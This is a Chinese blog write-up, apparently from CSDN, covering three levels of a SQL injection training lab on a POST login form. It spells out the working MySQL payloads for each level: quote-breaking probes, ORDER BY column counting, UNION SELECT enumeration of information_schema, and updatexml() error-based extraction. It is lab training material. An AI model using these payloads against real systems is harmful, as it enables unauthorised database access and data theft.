mysql注入靶场,SQL注入靶场—Post注入 Rank1-3

最新推荐文章于 2024-02-10 06:24:39 发布
最新推荐文章于 2024-02-10 06:24:39 发布
阅读量148 收藏
点赞数
文章标签: mysql注入靶场

---------------------------------Rank 1 -------------------------------------------------

先在表单Username编辑框中输入1,点登录,页面回显如下:

876d580573d2

image.png

然后在Username中输入1',点登录,再看回显,看是否存在注入:

876d580573d2

image.png

可看到存在注入,且从错误提示信息中可以看到,数据库是MySQL,因此这里可以使用updatexml()函数进行报错注入,也可以直接构造union 联合查询语句进行注入。这里我就使用后者了。

先获取字段数,构造语句如下:

1' order by 3 #

876d580573d2

image.png

构造语句:

1' order by 2 #

则无报错信息,故字段数为2。

获取当前数据库名,构造语句如下:

1' union select 1,database() #

876d580573d2

image.png

获取表名,构造语句如下:

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

876d580573d2

image.png

获取字段名,构造语句如下:

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='zkaq' #

876d580573d2

image.png

然后查询zKaQ字段就能获取flag。

---------------------------------Rank 2 -------------------------------------------------

先在表单的Username编辑框中输入1,点登录,页面回显如下:

876d580573d2

image.png

可以看到这里在sql语句中,将username等号后面的值用小括号和双引号括起来了。

所以这次试用 1" 来判断是否存在注入:

876d580573d2

image.png

看到了熟悉的MySQL报错信息,这就好办了。

直接来吧,先确定字段数,构造如下语句:

1") order by 3 #

876d580573d2

image.png

再构造如下语句:

1") order by 2 #

结果没有报错信息出现,所以字段数是2。

获取当前数据库名,构造语句如下:

1") union select 1,database() #

876d580573d2

image.png

获取表名,构造语句如下:

1") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

876d580573d2

image.png

获取字段名,构造语句如下:

1") union select 1,group_concat(column_name) from information_schema.columns where table_name='zkaq' #

876d580573d2

image.png

然后查询zKaQ字段就能获取flag。

---------------------------------Rank 3 -------------------------------------------------

先在表单的Username编辑框中输入1,点登录,页面回显如下:

876d580573d2

image.png

可以看到这里在sql语句中,将username等号后面的值用小括号和单引号括起来了。

所以这里使用 1') 来判断是否存在注入:

876d580573d2

image.png

看到了熟悉的MySQL报错信息,本以来这道题也跟上面的Rank 1 和 Rank 2两道题一样的套路,但发现联合查询语句查询的结果并没有回显到页面中,因此就不能这么干了。

但幸运的是,用 1') 进行注入判断时,确实页面上出现了MySQL的报错信息,那下面尝试使用updatexml()进行报错注入。

首先获取当前数据库名,构造如下语句输入到Username编辑框中:

1') or updatexml(0,concat(0x3a,(select database())),0) #

876d580573d2

image.png

可以看到确实有错误信息显示在页面上,并且已经将所查询的信息暴出来了。

继续获取表名,构造如下语句:

1') or updatexml(0,concat(0x3a,(select table_name from information_schema.tables where table_schema='security' limit 4,1)),0) #

876d580573d2

image.png

获取字段名,构造如下语句:

1') or updatexml(0,concat(0x3a,(select column_name from information_schema.columns where table_name='zkaq' limit 1,1)),0) #

876d580573d2

image.png

然后查询zKaQ字段的内容就可以拿到flag。

游志军
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP+MYSQL 注入靶场
04-26
**PHP+MYSQL 注入靶场**是一个用于学习和实践**SQL注入**的平台,它包含相关的源代码,有助于用户深入理解漏洞的原理。通过这个靶场,你可以模拟真实环境下的安全测试,提升对SQL注入攻击的防御能力。下面将详细阐述...
sql注入靶场实操
m0_46104808的博客
10-27 1548
sql注入漏洞利用
SQL注入操作流程及实例演示+墨者学院靶场SQL手工注入漏洞测试(MySQL数据库)
ran的博客
01-12 1687
MYsQL5.0以上版本中,Mysql 有一个系统数据库 information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,相当于利用该表可以进行一次完整的注入,通过查询它获取指定数据库下面的表名、列名、具体数据信息。当输入了一些乱七八糟的内容之后,网页返回“404错误”或者进行了跳转,则说明本网站对输入的内容可能有检测,则说明这个网站大概率没有注入漏洞。返回的了两个数字,分别是“2”、“3”,因此,修改网址上的“2”、“3”为对应系统函数来进行信息收集。可以在参数值前加“-”;
Jeecg-Boot未授权SQL注入CVE-2023-1454
2301_81907423的博客
12-29 375
Win64;
网络安全05-sql-labs靶场全网最详细总结
最新发布
m0_68976043的博客
02-10 3032
sql注入有很多方式其中我们最详细见到的就是:基于错误的注入(Error-based Injection): 攻击者利用应用程序返回的错误消息来识别漏洞。通过在 SQL 查询中插入恶意代码,攻击者可以引发数据库错误,然后根据错误消息获得关于数据库结构和内容的信息。基于联合查询的注入(Union-based Injection): 攻击者利用 UNION 查询将恶意结果合并到应用程序的原始查询结果中。通过在 SQL 查询中插入 UNION 子句,攻击者可以将额外的查询结果合并到原始结果中,从而泄露敏感信息。基
mysql注入靶场_某靶场sql注入练习(MySQL)
weixin_42518709的博客
02-01 455
这个之前就做了,但是当时没有做记录,所以这次重新进行一次,顺便把过程记录下来,分享给大家。-----没什么技术含量,仅仅是一次练习的记录-----启动靶场好的,现在靶场启动成功,点击“[点击访问]”进入靶场。这里是主界面:从这里可以看到,需要通过sql注入来拿到用户登陆账号密码。然后这个页面除了登陆相关的内容可以点击,就只有“登录”按钮下面的公告可以点开,这里点开公告。这里看到了一条公告,而且我们...
mysql注入-sqlilabs靶场注入
10-15
SQL注入攻击者可以利用这个漏洞执行恶意的SQL命令,获取、修改、删除数据库中的敏感信息,甚至完全控制数据库服务器。本教程基于SQLiLabs靶场,将深入探讨MySQL注入的各种技术和防御策略。 SQLiLabs是专门为学习和...
10-sql注入-mysql注入1
08-03
1. **SQL注入原理**: 当应用程序将用户提供的数据直接拼接到SQL查询中而不进行适当验证时,就可能发生SQL注入。攻击者可以通过构造特定的输入,使SQL查询执行非预期的操作,如读取、修改或删除敏感数据,甚至获取...
sql注入靶场.zip
06-24
这个"sql注入靶场.zip"文件包含了一个名为"sqli-labs-master"的靶场,旨在帮助学习者了解、实践和防御SQL注入攻击。靶场通常由一系列逐步增加难度的挑战组成,让学习者通过实际操作来提升自己的安全技能。 靶场的...
web-报错注入-皮卡丘靶场
07-15
防止报错注入的关键在于对用户输入进行严格的验证和过滤,避免在错误消息中泄露敏感信息,以及使用预编译的SQL语句(如参数化查询或存储过程),以减少SQL注入的风险。在进行渗透测试或安全训练时,皮卡丘靶场提供了...
mysql后台注入靶场源码.rar
04-21
该资源为存在漏洞的网站源码,学习web安全的小伙伴可以用来搭建环境做测试用 方法: 上传所有文件到空间根目录下,运行http://你的域名/install进行安装 安装过程遇到的数据库用户名和密码可以咨询空间你的空间商 不需要会员功能可以删除member目录 安装完成后更改admin目录为你的后台目录名,更改后的访问地址为 http://你的域名/修改的后台目录名 安装完成后请及时删除install目录
五分钟制作sql注入靶场
ChenD的学习笔记
10-15 2047
接触安全也快两个月了,学了很多安全的知识,也接触到了渗透测试,前面学习了sql注入和XSS漏洞,听郭老师说可以尝试自己搭建一个靶场,所以开始制作自己靶场
mysql注入靶场_靶场练习-墨者学院-sql注入- 手工注入漏洞测试(MySQL数据库-字符型)...
weixin_28733933的博客
02-01 146
背景知识1.Mysql的数据结构mysql中有一个information_schema数据库,用于维护mysql中的其他数据库信息。其中的tables表的TABLE_SCHEMA字段为库名,TABLE_NAME字段为表名;columns表的TABLE_SCHEMA字段为所属的数据库,TABLE_NAME字段为表名,COLUMN_NAME字段为列名。2.手工注入方法。是否存在过滤,是否可绕过。是否可...
sql注入靶场实操
weixin_45711977的博客
06-23 3443
sql注入靶场实操
Web安全 SQL注入靶场搭建(玩转整个注入环境.)
网络安全领域___专研者.
05-25 5760
SQLI-LABS靶场概括: SQL语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。而Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程.
一次简单的SQL注入靶场练习
lza20001103的博客
07-24 4110
一次简单的SQL注入靶场练习
SQL注入详解 1-6关
君莫hacker的博客
09-24 857
less-1 主页如图,参数id出存在sql注入 判断注入类型 输入1’让其报错,从报错信息我们可以看到这可能是单引号字符型注入 验证注入类型 #页面返回正常 http://192.168.30.212:8001/Less-1/?id=1' and 1=1--+ #页面返回不正常 http://192.168.30.212:8001/Less-1/?id=1' and 1=2--+ 所以该注入类型为单引号字符型 确定字段数 #返回正常 1' order by 3--+ #返回异常 1'
第九周总结
ANYOUZHEN的博客
01-23 2211
1.ctfhub 网站源码 使用python脚本,一个个寻找,得到www.zip响应码为200,在浏览器中加入,得到flag 2.ctfhub bak文件 使用蚂蚁剑进行搜索,得到index.php里面有东西,我们使用浏览器进行访问, 得到flag 3.ctfhub vim缓存 ...
sql注入靶场安装/POST注入基础/一看就会
ChenD的学习笔记
10-05 802
SQL注入(二)post注入方法
SQL注入靶场sqli-labs
12-20
sqli-labs是一个基于SQL注入的游戏教程,它可以帮助用户更好地了解SQL注入的语法和原理。要搭建sqli-labs靶场,您可以按照以下步骤进行操作: 1. 下载sqli-labs项目:您可以从GitHub上的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值